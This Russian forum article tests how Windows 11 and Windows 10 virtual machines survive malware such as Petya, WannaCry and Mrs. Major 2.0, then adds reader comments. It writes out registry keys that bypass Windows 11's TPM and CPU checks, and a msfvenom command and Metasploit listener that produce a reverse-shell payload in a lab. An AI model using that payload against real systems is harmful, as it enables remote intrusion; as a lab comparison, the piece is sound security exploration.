• 4 июля стартует курс «Python для Пентестера ©» от команды The Codeby

    Понятные и наглядные учебные материалы с информацией для выполнения ДЗ; Проверка ДЗ вручную – наставник поможет улучшить написанный вами код; Помощь преподавателей при выполнении заданий или в изучении теории; Групповой чат в Telegram с другими учениками, проходящими курс; Опытные разработчики – команда Codeby School, лидер по информационной безопасности в RU-сегменте

    Запись на курс до 15 июля. Подробнее ...

  • 11 июля стартует «Курс «SQL-injection Master» ©» от команды The Codeby

    За 3 месяца вы пройдете путь от начальных навыков работы с SQL-запросами к базам данных до продвинутых техник. Научитесь находить уязвимости связанные с базами данных, и внедрять произвольный SQL-код в уязвимые приложения.

    На последнюю неделю приходится экзамен, где нужно будет показать свои навыки, взломав ряд уязвимых учебных сайтов, и добыть флаги. Успешно сдавшие экзамен получат сертификат.

    Запись на курс до 20 июля. Подробнее ...

Статья Магическая битва: последний Виндоус - противостояние: 11 vs 10: Mrs. Major 2.0, Petya, WannaCry и самоуничтожающийся антивируc

Предисловие

orig (1).gif

И здорова. Что-то захотелось мне очень отойти на статейку-другую от Исторической вирусологии. Формат, безусловно, крутой, если судить по количеству реакций и позитивных комментариев. Но давно у меня таился один концепт для статьи, возможно, он выйдет больше разговорным, но и информации будет достаточно. И это уже одиннадцатая статья подряд, в идеале у меня должны были начать кончаться идеи там, ну и так далее. А на деле напротив - чувствую себя в отличном расположении, для работы, духа. Погнали.

Шиндоус 11, ну здравствуй. Вышла она уже достаточно давно, как снег на голову посреди мая. Как бы создано было огромное количество обзоров, разборов, тестов и сравнений. Сразу скажу, что будет очень субъективно, так как я до сих пор не воспринимаю эту “новую” систему как что-то полноценное. Чисто обновили интерфейс, ну молодцы. Но я до сих пор не наблюдал, как её разрушали.

Забыл-забыл, ловите традицию:

Дисклеймер

На самом деле я против зла и то, что я покажу вам далее, может быть, практически применено различного рода антагонистами. Сразу предупреждаю, что я, как автор этой писанины , снимаю с себя ответственность за то с каким умыслом будет использована эта информация дальше. Виноват только и только тот, кто применяет знания, но не тот, кто ими делится. Автор лишь преследует благие цели, используя способы и пути злоумышленников, раскрывает суть преступного механизма, открывая людям глаза, демонстрируя способы защиты, ведь лучший протект — это знания.


Магическая битва: последний Виндоус - противостояние: 11 vs 10: Mrs. Major 2.0, Petya, WannaCry и самоуничтожающийся антивирус


А знаете, деструктивных мыслей и намерений у меня будет побольше творческих, возможно даже, я получу удовольствие уничтожив целых две системы, а итоги этого будут запечатлены здесь и выведены в что-то типа тезисов. Ну и решим, какая из этих двух ОС безопаснее и выносливее.

Если вы не поняли, то объясню кратенько, в одной из статей я там пообещал разнести в пух и прах свою рабочую систему, загружая на нее все из интернета. По правде, я решил немного изменить свои планы и провести битву между Виндоус 10, которую пользую уже около двух лет, и новенькой одиннадцатой. Состязание пройдет в одинаковых условиях:

  1. Использоваться будет VM Виртуал бокс(из-за негодований и капризов 11-ой перешли на другой) в равных условиях.
  2. Каждая из подопытных будет использовать равное количество оперативной памяти: 4 ГБ, и по два ядра процессора с возможностью загрузки под 100%. Конфигурация моего ПК-основы: 16 ГБ оперативной памяти, i3-11xxG4 Tiger Lake, 4 ядра, 8 потоков и максимальная скорость 4 Ггц.
  3. Тесты будут производиться поочередно, чтобы снизить эффект взаимного влияния. Это означает, что сами тесты будут произведены не в одно время, а в разное, дабы процессор и оперативная память моего ПК были максимально не загруженными.
  4. На каждую из исследуемых ОС будет загружено равное количество вредоносных программ и равное количество потенциально опасных файлов из одних и тех же сайтов, список предоставлю позже.
  5. Тестируемые не будут никак оптимизированы или настроены, разрушение будет происходить сразу же после установки.
  6. После тотального заражения двух систем, если они обе доживут, то проведем простенький бенчмарк производительности и посмотрим, какая держалась лучше.
  7. Использоваться будут самые новые ISO образы из официального сайта Майкрософт. Никаких торрентов и сборок, только то, что предоставил нам великий Билли Гейтс.

Немного слов о своей рабочей системе, лично я считаю её не идеальной, в ней куча нюансов, особенно касаемо оптимизации, чтобы добиться нормальной производительности после установки приходится производить кучу действий. Для работы она подходит идеально, а вот чтобы стабильненько поиграть во что-то - придется поднапрячься, но не считаю это критичным. Но если бы мне предоставили выбор между семеркой и десяткой, то не задумываясь даже я бы выбрал первую. Мой переход на эту версию шиндоус обусловлен обстоятельствами и невозможностью стабильной работы виндовс 7 на ССД.

Немного о особенностях скачивания ISOшек из сайта Майкрософт хотелось бы поговорить. Оказалось скачать их проблематично и если бы не помощь гугла, наверное, это бы и не удалось.

И вот значится, перехожу я на сайт скачивания и мне предлагают программу обновления, дела обстоят здесь так, что браузер передает информацию серверу сайта информацию о нашей системе и если вы пытаетесь скачать такой же образ, какой стоит у вас - не выйдет попросту. Потому есть несколько хитростей, сперва вызовем редактор кода комбинацией клавиш CTRL + ALT + I, затем кликаем на три точки - дополнительные инструменты - условия работы сети.

Снимаем галочку напротив пункта “использовать настройки браузера по умолчанию” и выставляем в качестве агента Хрома - Galaxy Nexus. После обновляем страницу и вуаля. Спокойненько качаем.

Screenshot_20.png


Со скачиванием 11-й таких проблем не возникнет, только если вы не будете делать это из такой же версии.

С установкой на виртуальную машину образа проблем ни у кого не должно возникнуть, если бы были какие-то особенности, то здесь они точно бы оказались. Раз ниже вы их не видите, значит там все проще паренной репы. Никогда не понимал этого выражения.

Пожалуй начнем с 11-ой, 10-тка просто ещё качается. Ещё 1400 дней ждать, крутой интернет у меня.
Этот компьютер не соответствует требованиям для установки системы, м-м-м. Спасибо. Оказалось, что 20 гигабайт на жестком диске ей мало, выделим 40. И все равно не так, тогда давайте попытаемся воспользоваться модификацией реестра, дабы обойти это ограничение. Здесь все достаточно просто, создаем файл с расширением .reg и воспользуемся следующими строками для регистрации их в реестре новой системы:
Код:
[HKEY_LOCAL_MACHINE\SYSTEM\Setup\LabConfig]
"bypassTPMCheck"=dword:00000001
"bypassSecureBootCheck"=dword:00000001
"bypassCPUCheck"=dword:00000001

Здесь не нужно быть гением, дабы понять, что эти команды значат простой сброс на минимальные системные требования, даже на калькуляторе запустим теперь. Гы.

Для того, чтобы внести изменения в реестре достаточно произвести выполнения командной строки комбинацией shift +f10, затем открыть блокнот:
Код:
notepad

Файл - открыть, перетащить туда готовый файл - правая кнопка мыши - регистрировать.

Прежде я создал общую системную папку и включил двунаправленный буфер обмена, здесь можно было пойти путем попроще, просто создать готовый .рег файл на устанавливаемой машине и открыть тот так же через блокнот, но я хочу попытаться именно перенести. А, ладно, после перезагрузки ОС сразу же умерла c ошибкой:
Код:
no bootable medium found

Как оказалось это можно исправить банальной повторной подгрузкой на жесткий диск виртуальной машины образа ОС.

Следующая попытка оказалось тоже неудачной, теперь мы столкнулись с проблемой:
Код:
редактор реестра не может импортировать

Короче это меня порядком достало и решено было попросту отредактировать реестр вручную, что, собственно , и было произведено.

Вызываем командную строку - regedit - переходим по заданному пути, создаем папку LabConfig и добавляем два параметра: bypassTPMCheck в формате DWord32 и аналогично bypassSecureBootCheck. После присваиваем им значение в “1”.

Господи, я скрин забыл, посмотрите короче. Господи, как же меня этот курсив бесит, глаза болят. Танцы с бубном, ладно, больше не буду о ошибках, сразу к делу, ибо это затянется. Крах полнейший с этим шиндоусом.

Screenshot_21.png


Ура-а. Пришло время переустанавливать Шиндоууус. Ладно, шучу. С горем, но запустились. Сперва ,что хотелось бы попробовать, так это поковырять эту систему каким-то банальным образом, типа как через Метасплоит и так далее. Если что заранее определил машины в одну подсеть. Поехали.

Вот эта бедняга максимально тупит, я не знаю почему, но даже без вмешательств она ведет себя порядком странно и дело не в низких характеристиках, вот сама система будто залочена в 30 кадров в секунду. Это как когда выпьешь лишнюю банку пива, все словно в каком-то эффекте видеоредактора. Скажу честно, что не смотрел и не читал никакие обзоры и весь мой негатив построен исключительно на личных впечатлениях, раз из-за неё я случайно делитнул Кали, которая у меня уже давно была, ну вы поняли. Хотя может оно и к лучшему, обновим арсенал старушки Кирин. :)


Первым дело, что мне хочется сделать с 11-й, так это провести комплексное сканирование на уязвимости, посредством какого-то популярного сканера: сюда войдут и порты, и службы, ну все короче.

М-м-м, если вам интересны эмоции пользователей этой версии, то пожалуйста( я с таким количеством проблем не сталкивался за всю свою жизнь, чтобы заставить хоть как-то её работать, я убил 4 часа):

mccom-j5cr48RfUxIcjOqgMm10A6JAeHyy827KD8UeHAMZrN1vIjRVpfBftHcfAgrpXghN3EOVy2byTtziNaTl9pVcM2ClvH75uxNqJNEiZcy0Bwgv9YpOneaWlGA2e5L8yKR3q1rFQHOrBFMQ



Сперва давайте определимся в одной ли вообще подсети наша виртуальная машинка с 11-ой:
Код:
netdiscover

Действительно, видим родненькую. Теперь проверим открытые порты:
Код:
nmap 192.168.42.2

Открыт исключительно TCP порт 53, так и должно быть, в идеале. В качестве сканера используем Нессус, никогда особо ним не пользовался, интересно, что же он нам покажет. Установка производится просто, сперва качается из официального сайта подходящую версию, после устанавливаете:
Код:
sudo dpkg -i nessus.deb

Запуск производится следующей командой:
Код:
systemctl start nessusd.service

screenshot_28-png.60341


Настройка и все прочее происходит после открытия 127.0.0.1 в окошке браузера, запустим сканирование и посмотрим, что у нас получится из этого, хотя результата ожидать какого-то не стоит.
Критические уязвимости отсутствуют. И вот мне стало интересно, а что будет, если использовать какой-то простенький реверс шелл из метасплоита, будет ли подключение? Замечу, что не буду никак прятать полезную нагрузку или создавать ту в ручном режиме. Айда проверим.

Для этого генерируем, используя Веном и полезную нагрузку Reverse_TCP на порту 4444, наш вредонос:
Код:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.42.129 LPORT=4444 -f exe -a x64 -o /home/infosecaddicts/codeby.exe

Затем запускаем слушатель на том же порту:
Код:
use exploit/multi/handler
set lhost 192.168.42.129
set payload
 windows/x64/meterpreter/reverse_tcp

Открываем на самом новом на данный момент виндоусе и… Дефендер мне не дает ничего сделать. Давайте отключим его и посмотрим сработает ли. Теперь срабатывает какой-то, ну на скрине поглядите, забыл как оно называется, но не блокирует запуск. Оболочка метерпретер открыта в нашей консоле, давайте пошаримся по системе, сперва перейдем в шелл:
Код:
shell

Screenshot_29.png
Screenshot_32.png


Ну, ничего особого. Здесь больше говорить не о чем. Приступим к самому интересному, к запуску рандомных вирусов. Врубайте фонк, короче. да, читать обязательно под эту музыку. :)


Идем в гугл и пишет следующий текст: “ЧИТЫЫЫ НА МАЙНКРАФФФФТ МОЯ ЖИЗНЬ” .


Почему майнкрафт? Ну типа у всех базовое представление, что в эту игру играют исключительно взрослые состоятельные люди больше четырех лет от роду, потому и, как мне кажется, здесь будет много всякого вредоносного ПО. Поехали. Мг-г, первый же сайт, смотрим, что здесь такого пишут:

“Atomic - это относительно новый чит-мод с примерно 115 полезных и читерских функций, С этим чит клиентом можно получить преимущество на серверах, пытаться хакать их анти читы, и в целом быть гораздо более имбовым игроком”.

Поехали, качаем!!!! Почему-то сразу два файла, странно. А какая разница, минутка безумства. А, это тупо лаунчер, даже Амиго не установился. Почему, ладно, идем дальше. Ага-а, здесь все почему-то на Джаве, поэтому погнали качать бесплатные читы на КС ГО. “СКАЧАТЬ БИСПЛАТНА ЧИТЫ НА КС ГООО МНЕ 3 ГОДА”. А че?

Если что я веду учет запуска программ и записываю из каких сайтов все бралось, дабы повторить то же самое на втором подопытном. Берем рандомный сайт из пятой страницы и качаем, пишут, мол вирусов нет. Поверим на слово. Кто вообще к пятой странице поисковика доходит?

photo5264737608716630355.jpg


Стоп, у нас же нет архиватора, а скачали архив - “СКОЧАТЬ ОРХИВОТОР БИСПЛАТНА”. Какой-то инсталятор на 600 мегабайт, конечно! он нам нужен.

О-о, родненький Амиго, ВК и прочая крутая штуковина. Ура! Реклама программы для повышения ФПС, безусловно нужна. Опять уведомляшка о том ,что что-то защитило мой компьютер, это что призрачный гонщик там сидит в ядре виндоус или че, ого, правда программа все равно запустилась.

Та-а-к, Яндекс Браузер установился, прогресс. Идем в правильном направлении. “ЧИТЫ НА КАЛ ОФ ДУТИ”. Я с этих баннеров потом коллаж сделаю вам, это нечто. Я чуть со страху не умер, на всю громкость наушников: “Привет, я Алиса, браузер установлен”. Будто бы я его устанавливал по собственной воле. Ну хватит нам читов, “Скочать взлом виндовс 11”, в итоге мне загрузило Оперу, опять Яндекс, Торрент, Скайп, Ворлд оф Варшипс, Волд оф Тэнкс, телеграмм и ещё какой-то антивирус, который потом сам решил удалиться, понял, что лишний на этой тусовке.

photo5264737608716630354.jpg


Теперь пойдём более серьезными путями: “Скачать программы для взлома” или “скачать хакерский софт для виндос”, а затем и “Установить программу для майнинга биткоинов 2023”: скачать программу даймонд крякер, скачать игру Бравл Старс через торрент на ПК 2022 онлайн, играть без регистрации.

И на этом моменте мне пришлось становится серьёзным, ибо произошло вот это:

Screenshot_44.png


Для меня это один из самых страшных вирусов - Мисис Мажор 2.0. Его достаточно просто обмануть, но все таки. Бравл старс через торрент качает этот зловред, будьте внимательны, если тоже захотите скачать его таким образом.

Правда он был написан исключительно в целях исследований, поэтому выдает кучу предупреждений типа “это вирус, не устанавливай на основную машину”, но суть такова, что он у нас, мы его поймали. Ещё интересный факт, что сама система уже очень тупила, хотя мы установили всего-то 25 различных файлов и не все они были зловредами. Максимально страшные звуки, музыка, скримеры.

Отключенный Дефендер максимально старался помочь и в итоге система просто перезагрузилась. Смотрим, что произошло. Встроенные средства защиты виндоуса обезвредили фактически вирус, он исключительно копирует свои ярлыки, нет таймера, а быть он должен. Хвалю шиндоус 11. Ярлыки и иконки заменяются на какого-то черта. Валера, ты что-ли? Но вредонос явно работает неполноценно: не закрываются окна, нет таймера и прочего. Если Виндоус 10 запустит этот зловред без ошибок, то я покажу, как же бороться с ним, когда он в здравии.

288 процессов, теперь давайте установим какой-то рандомный антивирус и проверим количество зараженных файлов, а после запустим Петю. :))

photo5264737608716630353.jpg


А нет, бенчмарк. Точно. Проверять будем через сервис, который примерно показывает ФПС в популярных играх, как по мне, это лучшее решение.

На данный момент уже 300 процессов, оперативная память загружена на 89%.

Публикую сводку: КСГО - 10 кадров в секунду. При учете, что до нашего разгильдяйства было около 120. Пабг - 1-2 кадра в секунду, было 40-50. И универсальный индикатор - Танки Онлайн - 30-20 кадров на максимальных настройках, было порядка 100.

А теперь Петя, мне интересно, что с ним станет. Сразу же после запуска… Барабанная дробь. Экран смерти. Перезагрузка и.. Он запускается. Вау-у. Дефендер флудит уведомлениями, что нашел программу-шантажиста, да. Действительно, это она, как ты угадал, братец? К гадалке сходил? Петя просто крашит систему, он сам не хочет никак работать с 11-й виндой. Ладно. Вот здесь оставлю видео, кстати после него система больше не загрузилась, где я пытался запустить WannaCry и прочие вирусы, ну и можете посмотреть, что происходило с системой. Я приятно впечатлен, переходим к десятке. И только, когда пересматривал видео, заметил, что Ваннакрай таки сработал, а я не понял сразу.


Ммм, родненький интерфейс. Здесь я не буду расписывать, что, откуда и как, просто молча себе повторю все то же самое.

Кстати реверс_тсп тоже здесь прошел без особых проблем, но дефендер и не пытался заблокировать файл. А вот десятку мне жалко почему-то.. Не знаю, она действительно круто смотрится и работает, хотя… Плевать.

И вот уже последний файл, тот самый, содержащий Мисис Мажор, система никак на него не реагирует, если в Виндоус 11, она пыталась и всячески пищала, мол постой, не нужно, то здесь глухо.


Первый запуск и мне просто не дали ничего сделать, мерцающие картинки даже правил почитать не сделали возможным, а после попытки перезагрузки и красный экран смерти. Но с этим вредоносом можно бороться и очень даже просто. Достаточно всего-то успеть заморозить процесс хакером все процессы вируса, после создать замену исполняемым файлам в фейковой папке Program Files и перезапустить систему. Подробно могу провести его анализ в цикле Историческая Вирусология, если уж так захочется кому-то, но он для меня не представляет особого интереса, ибо он не вредил никому и у него нет особо какой-то истории. Просто вирусняк для анализа и тестов.

Screenshot_48.png


А вот ФПС в играх и общую производительность уже не проверить, ведь система сдохла. По факту это один ноль в пользу Виндоус 11, при том чистые. Но если посчитать сколько нервов я угробил на то, чтобы просто её запустить: с подключенной сетью, со всеми драйверами, со звуком. Оно того не стоит.

Итоги


И вот, тестовый формат подошел к концу, в целом, мне понравилось, если бы не одно но, огромное НО. Технически победа за Виндоус 11, ведь она выдержала все вирусы и осталась плюс-минус работоспособной и даже показывала неплохой ФПС в играх. Правда стоит ли оно того? Неудобный и тупящий интерфейс, куча нюансов по настройке, плохая оптимизация.

11-я позволяла на себя ставить весь мусор, но она его держала. 10-тка же отхлебнула, даже не дав никак ей помочь, видео я где-то выше вставлю. Мне даже стало чуточку обидно, что версия, которая может на данный момент считаться самой популярной, так банально загнулась.

Я действительно был искренне удивлен, когда старшая сестра продолжила свою работу, да с постоянными перезагрузками и с огромным количеством процессов, но она функционировала. Ей даже можно ещё пользоваться, пока я не начал запускать хаотично вирусы. Ну, а десятка действительно подвела. Решайте сами, стоит ли оно того. А с вами был, уже как всегда, какой-то парнишка под ником DeathDay и … Вот не знаю, как назвать этот формат. Магическая битва? Пусть будет. Не прощаюсь. Мира всем. Кстати если вам такой форматик зайдёт, то в дальнейшем можем устраивать бои между различными ОС и таким образом их уничтожать, и смотреть кто выживет, а кто нет.


Trojans Never Jokes, Respect the Trojans. #IHateWin11​
 
Последнее редактирование:

Крисофник

Green Team
22.07.2020
12
15
Чтоооо?! Солидарен с автором в его антипатии к 11, но думал что он провалится и 10 будет лучше. Очень позитивная статья, улыбнуло, твоё творчество уникально. Вроде бы серьезная инфа но как же мегасупер подано. Сравни 11 и 8 или 7
 
  • Нравится
Реакции: Deanned, Дод и DeathDay

SearcherSlava

Red Team
10.06.2017
909
1 228
Братья, сестры, здравы будьте!

В системах разбираться не забудьте.

Если на Винде сидишь
Или Линь заглючит
Почитай про NSA
Там плохому не научат
 

Вложения

  • Campbell D. How NSA access was built into Windows.pdf
    290,8 КБ · Просмотры: 12
  • Guide to Securing Microsoft Windows XP Systems for IT Professionals. A NIST Security Configura...pdf
    1,5 МБ · Просмотры: 15
  • Guide to Securing Microsoft Windows XP.pdf
    1,7 МБ · Просмотры: 10
  • UEFI Secure Boot Customization.PDF
    1,7 МБ · Просмотры: 14
  • Windows NT Security Guidelines.pdf
    437,8 КБ · Просмотры: 11
  • Нравится
Реакции: Mogen и DeathDay

Deanned

One Level
09.02.2022
6
2
Интересная подача статьи. (Сижу на 11 и знаете в чём беда, перешел на 11 когда была бета-версия и столкнулся с бедой что обновления не приходят, что бы исправить пришлось откатиться на 10 и снова на 11)
 
  • Нравится
Реакции: DeathDay
Мы в соцсетях:

Похожие темы